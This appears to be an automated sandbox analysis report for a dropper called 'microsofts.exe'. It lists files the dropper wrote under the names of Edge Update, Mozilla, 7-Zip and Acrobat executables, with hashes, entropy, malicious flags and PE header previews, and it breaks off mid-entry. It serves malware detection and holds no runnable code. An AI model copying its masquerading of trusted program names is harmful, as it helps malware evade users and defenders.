                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................U.......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.13887056105472
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:PIkOkTB+w5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:PIxkTBV5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:664FACE68FE3811FA50B87C45742BC26
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D80324E2655E3EB97BC56942061288CB45A7F41A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:300C114E1271486FEAC4E1E20E732727F3E90AB6F351509E13A4958259FC7E26
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:48F03A5B62D1FFE51F3AE9A9B13667198841B7017A27B05FEACFFF3754771BB3093887BAC19734A303B9EE99D96F84591F56D5BABD74BF930426BBD505165915
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................{.......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1335296
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.236795234359163
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:B4lssmroCOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:BcssmrAsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9A6940D22DFB1C84B34264101C78744B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:58813EA95ECBD1ECC4583442BAB7ACF81C1EBB0D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:097C27298054D442B46DC4DD735896F76677746DF5BA214E610140AD1DC4F2CA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F87B1A96DD29227CFFD4BE15E73D7C7D9191B252DAA5F6347FEE03DC0499F8066D5AC09A81AE99B92B00718FF8ABD04E081FEE9AE4FDCACCB1299B877D1ABF7B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@....................................MJ.... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.338543541842544
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:203cT++foSBWU2Yxhkg3sqjnhMgeiCl7G0nehbGZpbD:t3cK+foQWU2YnPLDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6DD8ADC2FC1E2C512EEA02E75F8AECFA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EF878C0076CC958466B21C9CEC637D80107652B6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:347857ECA9081661E4ED6458C9FE0BF47D64EB765D1587DC532DB3378439FF16
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:68DD3228F95AD3B8B1F7C4807DBF118ED69992B2C9C8874E3C55F863882358FF5112156ADD179F3A2CDFB80B5850F19D1F0B3F6F16965CC4FBEB7CABFFA813B5
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@..........................................................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1221120
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1389244527142015
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:bbrNRzB+NXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:bbBRzBgXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:68DDD564181534B75162527DF8F73E7D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F2C00E9D7DD727A7C6FCEB71DCC8ABF3EB5EF35A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E90778C49F6C392FEA5969A14D9555CE55C1DA96E03810678E0B9D1F7C047660
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DB1B5FE39ED21503991599E1F1C9EAAFF2AB16159354135E207A8BF8DF7D067ECEAC6277EA651D0996D625CFDD170CFB64D4A6A879E888DA2FF930DD13B6D47E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.940563311911797
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:Xy53w24gQu3TPZ2psFkiSqwozlDmg27RnWGj:XyFQgZqsFki+ozlD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07511574717C864659E15057239367AE
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1A341E8FE754F889BE796C30D1F5667AEA2750A0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BBBA974166F82F114025805CBAC1AB355C82B92B9C58AA344CC6E11AA5CD1D61
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:04006564310BE18948E40035EEA1AE354A186B85F413F747CCB9DC80DFF3BF854B06CC66DDC03451CB2DD73BCA35944C6834FE8DD91408C26355FBC2DAEEB9FD
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!......h!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3141
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.844763378727272
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:Idn0+RZWtcWmIUOyWqiNzWlbvW07SqWqNW36Wcv+l6gMKW0a:Ii+RE5mny3NiUlqA3tnWD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A997FF94A57F8F9105350C488EFCA97D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A78B8A5F1D106816EF4F55D27B85BA4F3CE5D1C5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DCF2D5DC2BE5179F61CB707A97A87586E005F467B11FFA45841FEAE8E40A1230
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6A92C907FA5A49BDD7291015A669F0A2C532D26D9BA3A11DD5ECFB74651CA01BD21071CCD0BFEDE22D045AB0D4833955B71ABA25BE27F4020FD1B6B1D740657F
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-05 11:02:58-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-05 11:02:58-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-05 11:02:58-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-05 11:02:5

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.34783915182234
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:+QVTZu0J1sqjnhMgeiCl7G0nehbGZpbD:lVTZu0Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7BBB6DB310D239DA8D65A687C939EAA5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:527FA0419D9C713C4FD309A212C2717247CCB565
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F7DBE565C72A8193883449781461F5C1E3B8129FDBC4E02143C2E67DCA492372
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0CC41D413BCBAD3C201E5E99C1E319B499F786C7E7D97D196A4390C6FA5292A4FDF8A519CB67314A0A52E94E7A2FDC75AE1BD073B672D32D9392DBBF9D54EA0E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.623122327004064
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:f+gkESfh4Co2sqjnhMgeiCl7G0nehbGZpbD:WgkE+SoDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6BD1B03266806CC18E168423DC3913B1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:32FBFA89F107F5AC5A89ADFE9CF91EF02AD7279C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:60E7D4C58107C70FB74AD88CACB0A11E02019407EDDA9CE90A11936E888EF91D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:42392C1501C8C48685336CFD6E6662EAB69B4B97A189432E36B461347A15F8F0544D12097692CE337B1F5B9C48D5CADA9875F2FD2EC97D338AD5B0D8CE4E546D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. .......c.... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.096636761645392
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:6BpDRmi78gkPXlyo0Gtjr9sqjnhMgeiCl7G0nehbGZpbD:eNRmi78gkPX4o0Gtj9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D3659BE3E49A91C5A45D9108E5A47E1C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D807730FFF24093C88AB1F618FA6EA10D1C710EA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AF810E057E73AEDB2DF96F6D10EC115F5A9CBBFB008EAED29B17F0BF4B18E9FF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B5A2077349A82C1248A26328FBABBDFEB44DE565F822F09DF82098D3FAF7F1D323F87323F712459E6BCCDE2624479FCFD26639D2902613519A5B9B77EA6630A0
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................t..... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.229044767852432
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:rLOS2oTPIXV2sqjnhMgeiCl7G0nehbGZpbD:V/T1Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D59B464FF439563CC8C1B5F5F5FC850F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E19137B901E3F29EBF2FBC672EF73A65626243C6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9188B53B862E70B0BA48AF2AB8D13ED18FA66B21FFADD87B2929CE5697E85492
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4AE527A7DE2C13705B0ABD55DAF55F200D806ECB27F686971A28B0C7B8E355585D67D24F712DB9126FB7098A05D2182E3733EEFD3E14E20F73F8AEA4D3C348D9
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................i.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1145344
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.03119442769536
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:s1cXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:s1csqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4247B9C0FFA0B63552F47580B682405F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:72DDEE350C0568E44F2F064B1718D7B5D117A9C9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AE1C9C586185459FD96B7310638F0AF8FD0AB28AA202851550D228948897E335
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:67D64273CE936BDCC5CD7E91D424EA35C25F4066D5ABE476686AE1164208E6F4AF5D917F32CC2F676AB0568EB3ACCB3B56E1006CF526D11CDBDC76BACAF9FD6B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................fC......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.712018958656891
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:iRudzDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iAdzDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A5056C674D94C49DCC978651C0823091
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4B71E105ADC1F1C40B946FDB23AD262D4D5C1E4A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0DDBA6551C28CBD575A1EAACFA3B41A1713BABC26CA549D0962C9B8F7051F8AC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B9393B2B8E3C83AEAA6341339E91EB484A0AD739059A0BF9543F170FF7109E0D6AED25601203DA009F1142B606D5A1EC300AAF4C6FBE752B20817FC9342626A4
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@.....................................K.... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1457664
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.082150463486846
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:Xv3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:vsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B84BE6DE9A91A34B04E9B962C1D092E2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:720CCE8D8B688681AF1DBD46FEC967C20FA9F391
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:642DA68FDEA360D38243730563142E30DC48D00E4EDDF2BD332BFC8C49026A7E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:14666DB3602C7A048BFFD328CF1A51F7DAB1D8036B6249CC470D10F65DF4F89F1D7E1FE5749B1DEA9DD05715F57027F997A891B12936C3CA73AD4A53F306FA77
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@.......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
